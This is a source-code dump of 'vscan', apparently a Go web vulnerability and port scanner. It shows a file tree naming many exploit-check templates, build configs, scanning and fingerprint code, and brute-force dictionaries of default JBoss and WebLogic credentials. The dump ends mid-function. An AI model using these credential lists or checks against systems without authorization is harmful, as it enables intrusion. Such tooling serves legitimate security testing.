dedecms-carbuyaction-fileinclude.yml │ ├── dedecms-cve-2018-6910.yml │ ├── dedecms-cve-2018-7700-rce.yml │ ├── dedecms-guestbook-sqli.yml │ ├── dedecms-membergroup-sqli.yml │ ├── dedecms-url-redirection.yml │ ├── discuz-ml3x-cnvd-2019-22239.yml │ ├── discuz-v72-sqli.yml │ ├── discuz-wechat-plugins-unauth.yml │ ├── discuz-wooyun-2010-080723.yml │ ├── dlink-850l-info-leak.yml │ ├── dlink-cve-2019-16920-rce.yml │ ├── dlink-cve-2019-17506.yml │ ├── dlink-cve-2020-25078-account-disclosure.yml │ ├── 
dlink-cve-2020-9376-dump-credentials.yml │ ├── dlink-dsl-2888a-rce.yml │ ├── docker-api-unauthorized-rce.yml │ ├── docker-registry-api-unauth.yml │ ├── dotnetcms-sqli.yml │ ├── draytek-cve-2020-8515.yml │ ├── druid-monitor-unauth.yml │ ├── drupal-cve-2014-3704-sqli.yml │ ├── drupal-cve-2018-7600-rce.yml │ ├── drupal-cve-2019-6340.yml │ ├── dubbo-admin-default-password.yml │ ├── duomicms-sqli.yml │ ├── dvr-cve-2018-9995.yml │ ├── e-zkeco-cnvd-2020-57264-read-file.yml │ ├── ecology-arbitrary-file-upload.yml │ ├── ecology-filedownload-directory-traversal.yml │ ├── ecology-javabeanshell-rce.yml │ ├── ecology-springframework-directory-traversal.yml │ ├── ecology-syncuserinfo-sqli.yml │ ├── ecology-v8-sqli.yml │ ├── ecology-validate-sqli.yml │ ├── ecology-workflowcentertreedata-sqli.yml │ ├── ecshop-cnvd-2020-58823-sqli.yml │ ├── ecshop-collection-list-sqli.yml │ ├── ecshop-rce.yml │ ├── eea-info-leak-cnvd-2021-10543.yml │ ├── elasticsearch-cve-2014-3120.yml │ ├── elasticsearch-cve-2015-1427.yml │ ├── elasticsearch-cve-2015-3337-lfi.yml │ ├── elasticsearch-cve-2015-5531.yml │ ├── elasticsearch-unauth.yml │ ├── etcd-unauth.yml │ ├── etouch-v2-sqli.yml │ ├── exchange-cve-2021-26855-ssrf.yml │ ├── exchange-cve-2021-41349-xss.yml │ ├── f5-cve-2021-22986.yml │ ├── f5-tmui-cve-2020-5902-rce.yml │ ├── fangweicms-sqli.yml │ ├── feifeicms-lfr.yml │ ├── finecms-sqli.yml │ ├── finereport-directory-traversal.yml │ ├── flexpaper-cve-2018-11686.yml │ ├── flink-jobmanager-cve-2020-17519-lfi.yml │ ├── fortigate-cve-2018-13379-readfile.yml │ ├── frp-dashboard-unauth.yml │ ├── gateone-cve-2020-35736.yml │ ├── gilacms-cve-2020-5515.yml │ ├── gitlab-graphql-info-leak-cve-2020-26413.yml │ ├── gitlab-ssrf-cve-2021-22214.yml │ ├── gitlist-rce-cve-2018-1000533.yml │ ├── glassfish-cve-2017-1000028-lfi.yml │ ├── go-pprof-leak.yml │ ├── gocd-cve-2021-43287.yml │ ├── grafana-default-password.yml │ ├── h2-database-web-console-unauthorized-access.yml │ ├── h3c-imc-rce.yml │ ├── 
h3c-secparh-any-user-login.yml │ ├── h5s-video-platform-cnvd-2020-67113-unauth.yml │ ├── hadoop-yarn-unauth.yml │ ├── hanming-video-conferencing-file-read.yml │ ├── harbor-cve-2019-16097.yml │ ├── hikvision-cve-2017-7921.yml │ ├── hikvision-info-leak.yml │ ├── hikvision-intercom-service-default-password.yml │ ├── hikvision-unauthenticated-rce-cve-2021-36260.yml │ ├── hjtcloud-arbitrary-fileread.yml │ ├── hjtcloud-directory-file-leak.yml │ ├── huawei-home-gateway-hg659-fileread.yml │ ├── ifw8-router-cve-2019-16313.yml │ ├── iis-put-getshell.yml │ ├── influxdb-unauth.yml │ ├── inspur-tscev4-cve-2020-21224-rce.yml │ ├── jboss-cve-2010-1871.yml │ ├── jboss-unauth.yml │ ├── jeewms-showordownbyurl-fileread.yml │ ├── jellyfin-cve-2021-29490.yml │ ├── jellyfin-file-read-cve-2021-21402.yml │ ├── jenkins-cve-2018-1000600.yml │ ├── jenkins-cve-2018-1000861-rce.yml │ ├── jenkins-unauthorized-access.yml │ ├── jetty-cve-2021-28164.yml │ ├── jinher-oa-c6-default-password.yml │ ├── jira-cve-2019-11581.yml │ ├── jira-cve-2019-8442.yml │ ├── jira-cve-2019-8449.yml │ ├── jira-cve-2020-14179.yml │ ├── jira-cve-2020-14181.yml │ ├── jira-ssrf-cve-2019-8451.yml │ ├── joomla-cnvd-2019-34135-rce.yml │ ├── joomla-component-vreview-sql.yml │ ├── joomla-cve-2015-7297-sqli.yml │ ├── joomla-cve-2017-8917-sqli.yml │ ├── joomla-cve-2018-7314-sql.yml │ ├── joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml │ ├── jumpserver-unauth-rce.yml │ ├── jupyter-notebook-unauthorized-access.yml │ ├── kafka-manager-unauth.yml │ ├── kibana-cve-2018-17246.yml │ ├── kibana-unauth.yml │ ├── kingdee-eas-directory-traversal.yml │ ├── kingsoft-v8-default-password.yml │ ├── kingsoft-v8-file-read.yml │ ├── kong-cve-2020-11710-unauth.yml │ ├── kubernetes-unauth.yml │ ├── kyan-network-monitoring-account-password-leakage.yml │ ├── landray-oa-custom-jsp-fileread.yml │ ├── lanproxy-cve-2021-3019-lfi.yml │ ├── laravel-cve-2021-3129.yml │ ├── laravel-debug-info-leak.yml │ ├── laravel-improper-webdir.yml │ ├── maccms-rce.yml │ ├── 
maccmsv10-backdoor.yml │ ├── metinfo-cve-2019-16996-sqli.yml │ ├── metinfo-cve-2019-16997-sqli.yml │ ├── metinfo-cve-2019-17418-sqli.yml │ ├── metinfo-file-read.yml │ ├── metinfo-lfi-cnvd-2018-13393.yml │ ├── minio-default-password.yml │ ├── mongo-express-cve-2019-10758.yml │ ├── mpsec-isg1000-file-read.yml │ ├── msvod-sqli.yml │ ├── myucms-lfr.yml │ ├── nagio-cve-2018-10735.yml │ ├── nagio-cve-2018-10736.yml │ ├── nagio-cve-2018-10737.yml │ ├── nagio-cve-2018-10738.yml │ ├── natshell-arbitrary-file-read.yml │ ├── netentsec-icg-default-password.yml │ ├── netentsec-ngfw-rce.yml │ ├── netgear-cve-2017-5521.yml │ ├── nextjs-cve-2017-16877.yml │ ├── nexus-cve-2019-7238.yml │ ├── nexus-cve-2020-10199.yml │ ├── nexus-cve-2020-10204.yml │ ├── nexus-default-password.yml │ ├── nexusdb-cve-2020-24571-path-traversal.yml │ ├── nhttpd-cve-2019-16278.yml │ ├── node-red-dashboard-file-read-cve-2021-3223.yml │ ├── novnc-url-redirection-cve-2021-3654.yml │ ├── nps-default-password.yml │ ├── ns-asg-file-read.yml │ ├── nsfocus-uts-password-leak.yml │ ├── nuuo-file-inclusion.yml │ ├── odoo-file-read.yml │ ├── openfire-cve-2019-18394-ssrf.yml │ ├── opentsdb-cve-2020-35476-rce.yml │ ├── panabit-gateway-default-password.yml │ ├── panabit-ixcache-default-password.yml │ ├── pandorafms-cve-2019-20224-rce.yml │ ├── pbootcms-database-file-download.yml │ ├── pentaho-cve-2021-31602-authentication-bypass.yml │ ├── php-cgi-cve-2012-1823.yml │ ├── phpcms-cve-2018-19127.yml │ ├── phpmyadmin-cve-2018-12613-file-inclusion.yml │ ├── phpmyadmin-setup-deserialization.yml │ ├── phpok-sqli.yml │ ├── phpshe-sqli.yml │ ├── phpstudy-backdoor-rce.yml │ ├── phpstudy-nginx-wrong-resolve.yml │ ├── phpunit-cve-2017-9841-rce.yml │ ├── powercreator-arbitrary-file-upload.yml │ ├── prometheus-url-redirection-cve-2021-29622.yml │ ├── pulse-cve-2019-11510.yml │ ├── pyspider-unauthorized-access.yml │ ├── qibocms-sqli.yml │ ├── qilin-bastion-host-rce.yml │ ├── qizhi-fortressaircraft-unauthorized.yml │ ├── 
qnap-cve-2019-7192.yml │ ├── rabbitmq-default-password.yml │ ├── rails-cve-2018-3760-rce.yml │ ├── razor-cve-2018-8770.yml │ ├── rconfig-cve-2019-16663.yml │ ├── resin-cnnvd-200705-315.yml │ ├── resin-inputfile-fileread-or-ssrf.yml │ ├── resin-viewfile-fileread.yml │ ├── rockmongo-default-password.yml │ ├── ruijie-eg-cli-rce.yml │ ├── ruijie-eg-file-read.yml │ ├── ruijie-eg-info-leak.yml │ ├── ruijie-eweb-rce-cnvd-2021-09650.yml │ ├── ruijie-nbr1300g-cli-password-leak.yml │ ├── ruijie-uac-cnvd-2021-14536.yml │ ├── ruoyi-management-fileread.yml │ ├── saltstack-cve-2020-16846.yml │ ├── saltstack-cve-2021-25282-file-write.yml │ ├── samsung-wea453e-default-pwd.yml │ ├── samsung-wea453e-rce.yml │ ├── samsung-wlan-ap-wea453e-rce.yml │ ├── sangfor-ba-rce.yml │ ├── sangfor-edr-arbitrary-admin-login.yml │ ├── sangfor-edr-cssp-rce.yml │ ├── sangfor-edr-tool-rce.yml │ ├── satellian-cve-2020-7980-rce.yml │ ├── seacms-before-v992-rce.yml │ ├── seacms-rce.yml │ ├── seacms-sqli.yml │ ├── seacms-v654-rce.yml │ ├── seacmsv645-command-exec.yml │ ├── secnet-ac-default-password.yml │ ├── seeyon-a6-employee-info-leak.yml │ ├── seeyon-ajax-unauthorized-access.yml │ ├── seeyon-cnvd-2020-62422-readfile.yml │ ├── seeyon-oa-cookie-leak.yml │ ├── seeyon-session-leak.yml │ ├── seeyon-wooyun-2015-0108235-sqli.yml │ ├── seeyon-wooyun-2015-148227.yml │ ├── shiziyu-cms-apicontroller-sqli.yml │ ├── shopxo-cnvd-2021-15822.yml │ ├── showdoc-default-password.yml │ ├── showdoc-uploadfile.yml │ ├── skywalking-cve-2020-9483-sqli.yml │ ├── solarwinds-cve-2020-10148.yml │ ├── solr-cve-2017-12629-xxe.yml │ ├── solr-cve-2019-0193.yml │ ├── solr-fileread.yml │ ├── solr-velocity-template-rce.yml │ ├── sonarqube-cve-2020-27986-unauth.yml │ ├── sonicwall-ssl-vpn-rce.yml │ ├── spark-api-unauth.yml │ ├── spark-webui-unauth.yml │ ├── spon-ip-intercom-file-read.yml │ ├── spon-ip-intercom-ping-rce.yml │ ├── spring-cloud-cve-2020-5405.yml │ ├── spring-cloud-cve-2020-5410.yml │ ├── spring-cve-2016-4977.yml │ ├── 
springboot-env-unauth.yml │ ├── springcloud-cve-2019-3799.yml │ ├── supervisord-cve-2017-11610.yml │ ├── tamronos-iptv-rce.yml │ ├── telecom-gateway-default-password.yml │ ├── tensorboard-unauth.yml │ ├── terramaster-cve-2020-15568.yml │ ├── terramaster-tos-rce-cve-2020-28188.yml │ ├── thinkadmin-v6-readfile.yml │ ├── thinkcmf-lfi.yml │ ├── thinkcmf-write-shell.yml │ ├── thinkphp-controller-rce.yml │ ├── thinkphp-method-rce.yml │ ├── thinkphp-v6-file-write.yml │ ├── thinkphp5-controller-rce.yml │ ├── thinkphp5023-method-rce.yml │ ├── tianqing-info-leak.yml │ ├── tomcat-cve-2017-12615-rce.yml │ ├── tomcat-cve-2018-11759.yml │ ├── tongda-meeting-unauthorized-access.yml │ ├── tongda-user-session-disclosure.yml │ ├── tpshop-directory-traversal.yml │ ├── tpshop-sqli.yml │ ├── tvt-nvms-1000-file-read-cve-2019-20085.yml │ ├── typecho-rce.yml │ ├── ueditor-cnvd-2017-20077-file-upload.yml │ ├── uwsgi-cve-2018-7490.yml │ ├── vbulletin-cve-2019-16759-bypass.yml │ ├── vbulletin-cve-2019-16759.yml │ ├── vmware-vcenter-arbitrary-file-read.yml │ ├── vmware-vcenter-cve-2021-21985-rce.yml │ ├── vmware-vcenter-unauthorized-rce-cve-2021-21972.yml │ ├── vmware-vrealize-cve-2021-21975-ssrf.yml │ ├── weaver-ebridge-file-read.yml │ ├── weblogic-cve-2017-10271.yml │ ├── weblogic-cve-2019-2725.yml │ ├── weblogic-cve-2019-2729-1.yml │ ├── weblogic-cve-2019-2729-2.yml │ ├── weblogic-cve-2020-14750.yml │ ├── weblogic-ssrf.yml │ ├── webmin-cve-2019-15107-rce.yml │ ├── weiphp-path-traversal.yml │ ├── weiphp-sql.yml │ ├── wifisky-default-password-cnvd-2021-39012.yml │ ├── wordpress-cve-2019-19985-infoleak.yml │ ├── wordpress-ext-adaptive-images-lfi.yml │ ├── wordpress-ext-mailpress-rce.yml │ ├── wuzhicms-v410-sqli.yml │ ├── xdcms-sql.yml │ ├── xiuno-bbs-cvnd-2019-01348-reinstallation.yml │ ├── xunchi-cnvd-2020-23735-file-read.yml │ ├── yapi-rce.yml │ ├── yccms-rce.yml │ ├── yongyou-u8-oa-sqli.yml │ ├── yonyou-grp-u8-sqli-to-rce.yml │ ├── yonyou-grp-u8-sqli.yml │ ├── 
yonyou-nc-arbitrary-file-upload.yml │ ├── yonyou-nc-bsh-servlet-bshservlet-rce.yml │ ├── youphptube-encoder-cve-2019-5127.yml │ ├── youphptube-encoder-cve-2019-5128.yml │ ├── youphptube-encoder-cve-2019-5129.yml │ ├── yungoucms-sqli.yml │ ├── zabbix-authentication-bypass.yml │ ├── zabbix-cve-2016-10134-sqli.yml │ ├── zabbix-default-password.yml │ ├── zcms-v3-sqli.yml │ ├── zeit-nodejs-cve-2020-5284-directory-traversal.yml │ ├── zeroshell-cve-2019-12725-rce.yml │ ├── zimbra-cve-2019-9670-xxe.yml │ └── zzcms-zsmanage-sqli.yml └── yml_poc_check.go └── static ├── Installation.md ├── development.md ├── logo.png ├── pocs.md ├── running.md ├── scenario.md ├── starfile.jpeg ├── usage.md └── vscan-run.png /.github/build/linux.yml: -------------------------------------------------------------------------------- 1 | env: 2 | - GO111MODULE=on 3 | before: 4 | hooks: 5 | - go mod tidy 6 | project_name: vscan 7 | builds: 8 | - id: vscan-linux 9 | ldflags: 10 | - -s -w 11 | binary: vscan 12 | env: 13 | - CGO_ENABLED=1 14 | main: main.go 15 | goos: 16 | - linux 17 | goarch: 18 | - amd64 19 | archives: 20 | - format: zip 21 | 22 | checksum: 23 | name_template: "{{ .ProjectName }}-linux-checksums.txt" 24 | -------------------------------------------------------------------------------- /.github/build/mac.yml: -------------------------------------------------------------------------------- 1 | env: 2 | - GO111MODULE=on 3 | before: 4 | hooks: 5 | - go mod tidy 6 | project_name: vscan 7 | builds: 8 | - id: vscan-darwin 9 | ldflags: 10 | - -s -w 11 | binary: vscan 12 | env: 13 | - CGO_ENABLED=1 14 | main: main.go 15 | goos: 16 | - darwin 17 | goarch: 18 | - amd64 19 | 20 | archives: 21 | - format: zip 22 | replacements: 23 | darwin: macOS 24 | 25 | checksum: 26 | name_template: "{{ .ProjectName }}-mac-checksums.txt" 27 | -------------------------------------------------------------------------------- /.github/build/windows.yml: 
-------------------------------------------------------------------------------- 1 | env: 2 | - GO111MODULE=on 3 | before: 4 | hooks: 5 | - go mod tidy 6 | project_name: vscan 7 | builds: 8 | - id: vscan-windows 9 | ldflags: 10 | - -s -w 11 | binary: vscan 12 | env: 13 | - CGO_ENABLED=1 14 | - CC=x86_64-w64-mingw32-gcc 15 | - CXX=x86_64-w64-mingw32-g++ 16 | main: main.go 17 | goos: 18 | - windows 19 | goarch: 20 | - amd64 21 | 22 | archives: 23 | - format: zip 24 | 25 | checksum: 26 | name_template: "{{ .ProjectName }}-windows-checksums.txt" 27 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Binaries for programs and plugins 2 | .idea 3 | *.iml 4 | *.exe 5 | *.exe~ 6 | *.dll 7 | *.so 8 | *.dylib 9 | 10 | # Test binary, built with `go test -c` 11 | *.test 12 | 13 | # Output of the go coverage tool, specifically when used with LiteIDE 14 | *.out 15 | 16 | # Dependency directories (remove the comment below to include it) 17 | # vendor/ 18 | -------------------------------------------------------------------------------- /brute/dicts/jbossuserpass.txt: -------------------------------------------------------------------------------- 1 | jboss,jboss 2 | admin,admin 3 | jboss,123456 4 | admin,123456 5 | -------------------------------------------------------------------------------- /brute/dicts/weblogicuserpass.txt: -------------------------------------------------------------------------------- 1 | weblogic,weblogic 2 | weblogic,welcome1 3 | weblogic,Oracle@123 4 | weblogic,123456 5 | weblogic,weblogic123 6 | system,password 7 | guest,guest 8 | portaladmin,portaladmin 9 | admin,security 10 | joe,password 11 | mary,password 12 | system,security 13 | wlcsystem,wlcsystem 14 | wlcsystem,sipisystem -------------------------------------------------------------------------------- /pkg/fingerprint/eHoleFingerData.go: 
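--------------------------------------------------------------------------------
package fingerprint

import (
	_ "embed"
)

//go:embed dicts/eHoleFinger.json
var eHoleFinger string
--------------------------------------------------------------------------------
/pkg/fingerprint/localFingerData.go:
--------------------------------------------------------------------------------
package fingerprint

import (
	_ "embed"
)

//go:embed dicts/localFinger.json
var localFinger string
--------------------------------------------------------------------------------
/pkg/fingerprint/matchfinger.go:
--------------------------------------------------------------------------------
package fingerprint

import (
	"regexp"
	"strings"
)

// iskeyword reports whether str contains every entry of keyword, compared
// case-insensitively. An empty keyword list matches everything.
func iskeyword(str string, keyword []string) bool {
	// Lower-case the haystack once instead of once per keyword.
	haystack := strings.ToLower(str)
	for _, k := range keyword {
		if !strings.Contains(haystack, strings.ToLower(k)) {
			return false
		}
	}
	return true
}

// isregular reports whether str matches every regular expression in keyword.
// An empty keyword list matches everything.
//
// A pattern that does not compile counts as a non-match. regexp.MustCompile
// would panic on it, so a single malformed rule would abort the whole run.
// NOTE(review): patterns are compiled on every call; if this sits on a hot
// path, compile them once when the fingerprint rules are loaded.
func isregular(str string, keyword []string) bool {
	for _, k := range keyword {
		re, err := regexp.Compile(k)
		if err != nil {
			return false
		}
		if !re.MatchString(str) {
			return false
		}
	}
	return true
}
--------------------------------------------------------------------------------
/pkg/httpx/common/customheader/customheader.go: -------------------------------------------------------------------------------- 1 | package customheader 2 | 3 | import ( 4 | "github.com/projectdiscovery/stringsutil" 5 | ) 6 | 7 | // CustomHeaders valid for all requests 8 | type CustomHeaders []string 9 | 10 | // String returns just a label 11 | func (c *CustomHeaders) String() string { 12 | return "Custom Global Headers" 13 | } 14 | 15 | // Set a new global header 16 | func (c *CustomHeaders) Set(value string) error { 17 | *c = append(*c, 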
value) 18 | return nil 19 | } 20 | 21 | // Has checks if the list contains a header name 22 | func (c *CustomHeaders) Has(header string) bool { 23 | for _, customHeader := range *c { 24 | if stringsutil.HasPrefixAny(customHeader, header) { 25 | return true 26 | } 27 | } 28 | 29 | return false 30 | } 31 | -------------------------------------------------------------------------------- /pkg/httpx/common/customheader/doc.go: -------------------------------------------------------------------------------- 1 | // Package customheader contains all the funcionality to deal with Custom Global Headers 2 | package customheader 3 | -------------------------------------------------------------------------------- /pkg/httpx/common/customlist/customlist.go: -------------------------------------------------------------------------------- 1 | package customlist 2 | 3 | import "github.com/veo/vscan/pkg/httpx/common/fileutil" 4 | 5 | const maxRecursion = 10 6 | 7 | // CustomList for fastdialer 8 | type CustomList []string 9 | 10 | // String returns just a label 11 | func (c *CustomList) String() string { 12 | return "Custom Global List" 13 | } 14 | 15 | // Set a new global header 16 | func (c *CustomList) Set(value string) error { 17 | values := fileutil.LoadCidrsFromSliceOrFileWithMaxRecursion(value, ",", maxRecursion) 18 | *c = append(*c, values...) 
19 | return nil 20 | } 21 | -------------------------------------------------------------------------------- /pkg/httpx/common/customlist/doc.go: -------------------------------------------------------------------------------- 1 | // Package customlist contains all the funcionality to deal with Custom Target List 2 | package customlist 3 | -------------------------------------------------------------------------------- /pkg/httpx/common/customports/doc.go: -------------------------------------------------------------------------------- 1 | // Package customport contains all the funcionality to deal with HTTP ports 2 | package customport 3 | -------------------------------------------------------------------------------- /pkg/httpx/common/fileutil/doc.go: -------------------------------------------------------------------------------- 1 | // Package fileutil contains all the funcionality related to deal with files 2 | package fileutil 3 | -------------------------------------------------------------------------------- /pkg/httpx/common/hashes/doc.go: -------------------------------------------------------------------------------- 1 | package hashes 2 | -------------------------------------------------------------------------------- /pkg/httpx/common/httputilz/doc.go: -------------------------------------------------------------------------------- 1 | // Package httputilz contains all the funcionality related to common HTTP operations, dump, define methods... 
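2 | package httputilz 3 |
--------------------------------------------------------------------------------
/pkg/httpx/common/httpx/cdn.go:
--------------------------------------------------------------------------------
package httpx

import (
	"fmt"
	"net"
)

// CdnCheck verifies if the given ip is part of Cdn ranges.
//
// It returns an error when no CDN client is configured or when ip is not a
// valid IP literal; otherwise it returns whatever the CDN client reports.
func (h *HTTPX) CdnCheck(ip string) (bool, string, error) {
	if h.cdn == nil {
		return false, "", fmt.Errorf("cdn client not configured")
	}

	// net.ParseIP yields nil for anything that is not an IP literal. Reject it
	// here rather than handing a nil address to the CDN client.
	parsed := net.ParseIP(ip)
	if parsed == nil {
		return false, "", fmt.Errorf("%q is not a valid ip", ip)
	}

	return h.cdn.Check(parsed)
}
--------------------------------------------------------------------------------
/pkg/httpx/common/httpx/doc.go:
--------------------------------------------------------------------------------
// Package httpx contains the httpx common functionality
package httpx
--------------------------------------------------------------------------------
/pkg/httpx/common/httpx/tls.go:
--------------------------------------------------------------------------------
package httpx

import (
	"net/http"

	"github.com/projectdiscovery/cryptoutil"
)

// TLSGrab fills the TLSData from the TLS state of r. It returns nil when r is
// nil or the response carries no TLS state.
func (h *HTTPX) TLSGrab(r *http.Response) *cryptoutil.TLSData {
	if r == nil || r.TLS == nil {
		return nil
	}
	return cryptoutil.TLSGrab(r.TLS)
}
--------------------------------------------------------------------------------
/pkg/httpx/common/regexhelper/regex.go:
--------------------------------------------------------------------------------
package regexhelper

import "regexp"

var (
	// JarmHashRegex matches a run of 62 consecutive '0' characters.
	// NOTE(review): presumably used to recognise an all-zero JARM hash; confirm against the caller.
	JarmHashRegex = regexp.MustCompile("(?m)0{62}")
)
--------------------------------------------------------------------------------
/pkg/httpx/common/slice/doc.go:
--------------------------------------------------------------------------------
// Package slice contains a set of utilities to deal with slices
package slice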
-------------------------------------------------------------------------------- /pkg/httpx/common/stringz/doc.go: -------------------------------------------------------------------------------- 1 | // Package stringz contains a set of utilities to deal with strings 2 | package stringz 3 | -------------------------------------------------------------------------------- /pkg/httpx/runner/doc.go: -------------------------------------------------------------------------------- 1 | // Package runner executes the enumeration process. 2 | package runner 3 | -------------------------------------------------------------------------------- /pkg/httpx/runner/resume.go: -------------------------------------------------------------------------------- 1 | package runner 2 | 3 | type ResumeCfg struct { 4 | ResumeFrom string 5 | Index int 6 | current string 7 | currentIndex int 8 | } 9 | -------------------------------------------------------------------------------- /pkg/jndi/jndilog.go: -------------------------------------------------------------------------------- 1 | package jndi 2 | 3 | import ( 4 | "encoding/hex" 5 | "strings" 6 | ) 7 | 8 | func Jndilogchek(randomstr string) bool { 9 | if JndiLog == nil { 10 | return false 11 | } 12 | for _, log := range JndiLog { 13 | HexRandomstr := hex.EncodeToString([]byte(randomstr)) 14 | if strings.Contains(log, HexRandomstr) { 15 | return true 16 | } 17 | } 18 | return false 19 | } 20 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/privileges/privileges.go: -------------------------------------------------------------------------------- 1 | package privileges 2 | 3 | var IsPrivileged bool 4 | 5 | func init() { 6 | IsPrivileged = isPrivileged() 7 | } 8 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/privileges/privileges_darwin.go: -------------------------------------------------------------------------------- 1 | //go:build 
darwin 2 | 3 | package privileges 4 | 5 | import ( 6 | "os" 7 | ) 8 | 9 | // isPrivileged checks if the current process has the CAP_NET_RAW capability or is root 10 | func isPrivileged() bool { 11 | return os.Geteuid() == 0 12 | } 13 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/privileges/privileges_win.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | 3 | package privileges 4 | 5 | // IsPrivileged on windows doesn't matter as we are using connect scan 6 | func isPrivileged() bool { 7 | return false 8 | } 9 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/runner/banners_test.go: -------------------------------------------------------------------------------- 1 | package runner 2 | 3 | import ( 4 | "testing" 5 | 6 | "github.com/stretchr/testify/assert" 7 | ) 8 | 9 | func TestShowNetworkInterfaces(t *testing.T) { 10 | // non root users should be able to list interfaces 11 | assert.Nil(t, showNetworkInterfaces()) 12 | } 13 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/runner/default.go: -------------------------------------------------------------------------------- 1 | package runner 2 | 3 | const ( 4 | DefaultPortTimeoutSynScan = 1000 5 | DefaultPortTimeoutConnectScan = 5000 6 | 7 | DefaultRateSynScan = 1000 8 | DefaultRateConnectScan = 1500 9 | 10 | DefaultRetriesSynScan = 3 11 | DefaultRetriesConnectScan = 3 12 | 13 | ExternalTargetForTune = "8.8.8.8" 14 | 15 | SynScan = "s" 16 | ConnectScan = "c" 17 | DefautStatsInterval = 5 18 | ) 19 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/runner/validate_test.go: -------------------------------------------------------------------------------- 1 | package runner 2 | 3 | import ( 4 | "testing" 5 | 6 | "github.com/pkg/errors" 7 | 
"github.com/stretchr/testify/assert" 8 | ) 9 | 10 | func TestOptions(t *testing.T) { 11 | options := Options{} 12 | assert.ErrorIs(t, errNoInputList, options.validateOptions()) 13 | 14 | options.Host = []string{"target1", "target2"} 15 | assert.EqualError(t, options.validateOptions(), errors.Wrap(errZeroValue, "timeout").Error()) 16 | 17 | options.Timeout = 2 18 | assert.EqualError(t, options.validateOptions(), errors.Wrap(errZeroValue, "rate").Error()) 19 | 20 | options.Resolvers = "aaabbbccc" 21 | assert.NotNil(t, options.validateOptions()) 22 | } 23 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/scan/cdn.go: -------------------------------------------------------------------------------- 1 | package scan 2 | 3 | import ( 4 | "net" 5 | 6 | "github.com/pkg/errors" 7 | "github.com/projectdiscovery/iputil" 8 | ) 9 | 10 | // CdnCheck verifies if the given ip is part of Cdn ranges 11 | func (s *Scanner) CdnCheck(ip string) (bool, string, error) { 12 | if s.cdn == nil { 13 | return false, "", errors.New("cdn client not initialized") 14 | } 15 | if !iputil.IsIP(ip) { 16 | return false, "", errors.Errorf("%s is not a valid ip", ip) 17 | } 18 | return s.cdn.Check(net.ParseIP(ip)) 19 | } 20 | -------------------------------------------------------------------------------- /pkg/naabu/v2/pkg/scan/cdn_test.go: -------------------------------------------------------------------------------- 1 | package scan 2 | 3 | import ( 4 | "testing" 5 | 6 | "github.com/stretchr/testify/assert" 7 | ) 8 | 9 | func TestCdnCheck(t *testing.T) { 10 | s, err := NewScanner(&Options{ExcludeCdn: true}) 11 | assert.Nil(t, err) 12 | tests := []struct { 13 | args string 14 | want bool 15 | wantErr bool 16 | }{ 17 | {"192.168.1.1", false, false}, 18 | {"10.10.10.10", false, false}, 19 | {"aaaaa", false, true}, 20 | } 21 | for _, tt := range tests { 22 | t.Run(tt.args, func(t *testing.T) { 23 | isCdn, _, err := s.CdnCheck(tt.args) 24 | if tt.wantErr 
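{ 25 | assert.NotNil(t, err) 26 | } else { 27 | assert.Nil(t, err) 28 | } 29 | assert.Equal(t, tt.want, isCdn) 30 | }) 31 | } 32 | } 33 |
--------------------------------------------------------------------------------
/pkg/naabu/v2/pkg/scan/connect.go:
--------------------------------------------------------------------------------
package scan

import (
	"fmt"
	"net"

	"github.com/projectdiscovery/gologger"
)

// ConnectVerify is used to verify if ports are accurate using a connect request.
//
// Every port in ports is dialled over TCP with the scanner's timeout. Ports
// that cannot be connected to are deleted from the map that was passed in,
// and that same map is returned, so the caller's map is modified.
func (s *Scanner) ConnectVerify(host string, ports map[int]struct{}) map[int]struct{} {
	for port := range ports {
		// net.JoinHostPort brackets IPv6 literals; a plain "%s:%d" yields an
		// address that cannot be dialled for such hosts, which would drop
		// every port as closed.
		target := net.JoinHostPort(host, fmt.Sprint(port))
		conn, err := net.DialTimeout("tcp", target, s.timeout)
		if err != nil {
			delete(ports, port)
			continue
		}
		gologger.Debug().Msgf("Validated active port %d on %s\n", port, host)
		// Only the successful connect matters; a close error is not actionable.
		_ = conn.Close()
	}
	return ports
}
--------------------------------------------------------------------------------
/pkg/naabu/v2/pkg/scan/connect_test.go:
--------------------------------------------------------------------------------
package scan

import (
	"net"
	"testing"

	"github.com/stretchr/testify/assert"
)

func TestConnectVerify(t *testing.T) {
	// Open the listener before starting the accept loop, so the port is
	// guaranteed to be open when ConnectVerify dials it and a failed Listen
	// stops the test instead of dereferencing a nil listener.
	l, err := net.Listen("tcp", ":17895")
	if !assert.Nil(t, err) {
		return
	}
	defer l.Close()

	go func() {
		for {
			conn, err := l.Accept()
			if err != nil {
				return
			}
			// Close right away; a defer inside this loop would hold every
			// accepted connection open until the goroutine exits.
			conn.Close()
		}
	}()

	s, err := NewScanner(&Options{})
	assert.Nil(t, err)
	wanted := map[int]struct{}{17895: {}}
	got := s.ConnectVerify("localhost", map[int]struct{}{17895: {}, 17896: {}})
	assert.EqualValues(t, wanted, got)
}
--------------------------------------------------------------------------------
/pkg/naabu/v2/pkg/scan/externalip.go: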
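--------------------------------------------------------------------------------
package scan

import (
	"context"
	"fmt"
	"io"
	"io/ioutil"
	"net"
	"net/http"
	"strings"
	"time"
)

// WhatsMyIP attempts to obtain the external ip through public api.
//
// The lookup is an outbound HTTPS request to a third-party service, which
// therefore learns the address this host egresses from. The request is bounded
// by a timeout, the reply is size-limited, and the body is parsed as an IP
// address before it is returned; any other reply is reported as an error.
func WhatsMyIP() (string, error) {
	// Without a deadline a stalled connection would block the caller forever.
	ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
	defer cancel()

	req, err := http.NewRequestWithContext(ctx, http.MethodGet, "https://api.ipify.org?format=text", nil)
	if err != nil {
		// Propagate the failure; returning ("", nil) would look like a
		// successful lookup with an empty address.
		return "", err
	}

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return "", err
	}
	defer resp.Body.Close()

	if resp.StatusCode != http.StatusOK {
		return "", fmt.Errorf("external ip lookup: unexpected status %d", resp.StatusCode)
	}

	// A textual IP address is a few dozen bytes at most; cap the read so an
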